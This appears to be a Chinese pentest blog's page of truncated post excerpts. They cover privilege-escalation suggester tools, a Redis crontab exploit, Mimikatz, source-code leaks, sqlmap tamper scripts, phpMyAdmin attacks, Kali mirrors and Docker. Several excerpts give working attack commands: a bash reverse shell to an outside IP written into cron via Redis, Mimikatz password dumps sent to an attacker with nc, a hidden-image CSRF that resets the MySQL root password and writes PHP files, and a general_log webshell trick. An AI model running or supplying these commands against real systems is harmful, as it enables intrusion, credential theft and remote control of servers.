此工具是一款非常好用的Windows下提权辅助工具(已经支持Windows 10下的提权了),国内已经有许多人在用了,但是一直没有相应的中文文档,所以我特地翻译了一下,水平有限,如有错误,欢迎指出,谢谢。 描述 该工具可以将目标系统的补丁安装情况与微软的漏洞数据库进行对比,进而检测出目标系统中潜在的未修复漏洞。同时此工具还会告知用户针对于此漏洞是否有公开的exp和可用的Metasploit模块。 同时它可以使用–update参数去自动化地从微软下载漏洞补丁数据库,并将其以Excel表格的形式保存。 需要注意的是,此工具首先会假定目标系统存...
Linux_Exploit_Suggester是一款根据操作系统版本号自动查找相应提权脚本的工具,如果不带任何参数运行该脚本的话,将执行uname -r返回的操作系统发行版本,或者手工输入-k参数查找指定版本号。 例子: <span>$ perl ./Linux_Exploit_Suggester.pl -k 3.0.0 Kernel local: 3.0.0 Possible Exploits: [+] semtex CVE-2013-2094 Source: www.exploit-db.com/download/25444/ [+] memodipper CVE-2012-0056 Source: http://www.exploit-db.com/exploits/18411/ [+] perf_swevent CVE-2...
redis的exploit,完全不需要flushall破坏数据场景,redis-cli set 1 ‘ringzero’,这样可以控制第一条记录,就能保证你的内容始终保持在最前面; 测试环境:CentOS,RHEL # 利用crontab反弹shell redis-cli flushall echo -e "nn*/1 * * * * /bin/bash -i >& /dev/tcp/114.114.114.114/53 0>&1nn"|redis-cli -x set 1 redis-cli config set dir /var/spool/cron/ redis-cli config set dbfilename root redis-cli save # 利用crontab创建文件 /tmp/888 redis-cli flushall # 为了方便...
1.记录 Mimikatz输出: C:>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir 2.将输出导入到本地文件: C:>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt 3.将输出传输到远程机器: Attacker执行: E:>nc -lvp 4444 Victim执行: C:>mimikatz.exe ""privilege::debug"" ""se...
星外虚拟主机跨目录读取文件漏洞,需要一定条件。 详细说明: 问题发生在以下文件,这些文件都没有严格的设置执行权限,当前的IIS用户能够顺利的利用它们执行命令: c:windows7i24IISLOG.exe c:windows7i24IISLOG2.exe c:windows7i24IISLOG3.exe c:windows7i24IISLOG4.exe c:windows7i24tool.exe c:windowsrsb.exe 其中的7i24IISLOG.exe其实就是LogParser,LogParser是一款强大日志分析工具,下面利用它来列web目录: 在 webshell中 CmdPath: c:windows7i24IISLOG Argument: “select top 100 path from e:host*.*”...
背景 本文主要是记录一下常见的源码泄漏问题,这些经常在web渗透测试以及CTF中出现。 .hg源码泄漏 漏洞成因: hg init的时候会生成.hg e.g.http://www.example.com/.hg/ 漏洞利用: 工具: dvcs-ripper rip-hg.pl -v -u http://www.example.com/.hg/ .git源码泄漏 漏洞成因: 在运行git init初始化代码库的时候,会在当前目录下面产生一个.git的隐藏文件,用来记录代码的变更记录等等。在发布代码的时候,把.git这个目录没有删除,直接发布了。使用这个文件,可以用来恢复源代码。 e.g. http://www.example.com/.git/config 漏...
0x00 背景 sqlmap中的tamper脚本来对目标进行更高效的攻击。 由于乌云知识库少了sqlmap-tamper 收集一下,方便学习。 根据sqlmap中的tamper脚本可以学习过绕过一些技巧。 我收集在找相关的案例作为可分析什么环境使用什么tamper脚本。 小学生毕业的我,着能偷偷说一下多做一些收集对吸收知识很快。 0x01 start 脚本名:apostrophemask.py 作用:用utf8代替引号 Example: (“1 AND ‘1’=’1”) ‘1 AND %EF%BC%871%EF%BC%87=%EF%BC%871’ Tested against: all 脚本名:equaltolike.py 作用:like ...
修改root密码: 保存为:webshell.html <p>Hello World</p> <img src="https://webshell.cc/sql.php?db=mysql&table=user&sql_query=SET%20password%20=%20PASSWORD(%27www.webshell.cc%27)" style="display:none;" /> 密码为:www.webshell.cc 写文件 首先你要知道路径 保存为:webshell.html <p>Hello World</p> <img src="https://webshell.cc/sql.php?db=mysql&table=user&sql_query=select%20'<?php%20phpinfo();?>'%20into%20outfile%20'/var/www/html/test.php...
三个sql语句拿下phpmyadmin的shell 首先要知道路径 一句一句的执行 ——————————————————— set global general_log=’on’; ——————————————————— SET global general_log_file=’D:/webshell/www/cmd.php’; ————————...
一、更新 #阿里云 deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib #中科大 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib #浙大 deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free #清华大学 deb http://mirrors.tun...
####what is docker Docker是一个开源的引擎,可以轻松的为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署,包括VMs(虚拟机)、bare metal、OpenStack 集群和其他的基础应用平台。 #####Docker通常用于如下场景: web应用的自动化打包和发布;(我后面就会用到这个功能了额…) 自动化测试和持续集成、发布; 在服务型环境中部署和调整数据库或其他的后台应用; #####一些名词解释 image:镜像,是指将应用打包之后的存储方式,一个image包含多层layer,每...
